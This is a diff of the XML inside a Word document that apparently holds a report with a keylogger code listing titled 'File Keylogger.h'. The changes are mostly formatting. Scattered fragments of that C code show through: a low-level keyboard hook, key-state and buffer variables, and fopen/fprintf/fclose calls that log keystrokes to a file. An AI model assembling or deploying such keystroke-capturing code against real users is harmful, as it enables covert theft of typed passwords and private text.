       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -6253,11 +9109,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>. File Keylogger.h</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6400,7 +9260,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>HHOOK hKeyHook</w:t>
+        <w:t xml:space="preserve">HHOOK </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>hKeyHook</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6411,6 +9281,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6431,7 +9302,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>BYTE keyState</w:t>
+        <w:t xml:space="preserve">BYTE </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>keyState</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6442,6 +9323,7 @@
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6480,7 +9362,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>WCHAR buffer</w:t>
+        <w:t xml:space="preserve">WCHAR </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6491,6 +9383,7 @@
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6529,7 +9422,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>KBDLLHOOKSTRUCT kbdllStruct</w:t>
+        <w:t xml:space="preserve">KBDLLHOOKSTRUCT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kbdllStruct</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6540,6 +9443,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6584,6 +9488,7 @@
         </w:rPr>
         <w:t xml:space="preserve">LRESULT WINAPI </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6604,6 +9509,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6692,6 +9598,7 @@
         <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6710,7 +9617,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>((</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6983,6 +9900,7 @@
         </w:rPr>
         <w:t>*</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7001,6 +9919,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7060,6 +9979,7 @@
         </w:rPr>
         <w:t>KBDLLHOOKSTRUCT</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7078,6 +9998,7 @@
         </w:rPr>
         <w:t>lParam</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7126,7 +10047,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fopen</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7137,6 +10068,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7232,6 +10164,7 @@
         <w:tab/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7250,7 +10183,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>((</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7437,6 +10380,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>fprintf</w:t>
       </w:r>
       <w:r>
@@ -7448,6 +10400,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7544,6 +10497,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7564,6 +10518,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7669,7 +10624,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7680,6 +10645,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7750,6 +10716,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7770,6 +10737,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7875,7 +10843,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7886,6 +10864,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7965,6 +10944,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7985,6 +10965,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8090,7 +11071,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8101,6 +11092,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8171,6 +11163,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8191,6 +11184,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8305,7 +11299,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8316,6 +11320,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8386,6 +11391,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8406,6 +11412,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8521,6 +11528,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>fprintf</w:t>
       </w:r>
       <w:r>
@@ -8532,6 +11548,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8602,6 +11619,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8622,6 +11640,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8727,7 +11746,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8738,6 +11767,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8808,6 +11838,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8828,6 +11859,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8943,6 +11975,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>fprintf</w:t>
       </w:r>
       <w:r>
@@ -8954,6 +11995,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9024,6 +12066,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9044,6 +12087,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9149,7 +12193,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9160,6 +12214,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9230,6 +12285,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9250,6 +12306,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9355,7 +12412,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9366,6 +12433,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9436,6 +12504,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9456,6 +12525,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9622,7 +12692,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9633,6 +12713,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9703,6 +12784,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9723,6 +12805,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9889,7 +12972,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9900,6 +12993,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9970,6 +13064,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9990,6 +13085,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10127,6 +13223,7 @@
         </w:rPr>
         <w:t>keyState</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10136,6 +13233,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10159,6 +13257,7 @@
         <w:tab/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10179,6 +13278,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10472,7 +13572,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            fprintf</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10483,6 +13593,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10598,6 +13709,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10618,6 +13730,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10671,7 +13784,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">    fclose</w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10682,6 +13805,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10753,6 +13877,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10771,7 +13896,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>((</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11011,6 +14146,7 @@
         </w:rPr>
         <w:t>KBDLLHOOKSTRUCT</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11029,6 +14165,7 @@
         </w:rPr>
         <w:t>lParam</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11120,6 +14257,7 @@
         </w:rPr>
         <w:t>*</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11138,6 +14276,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
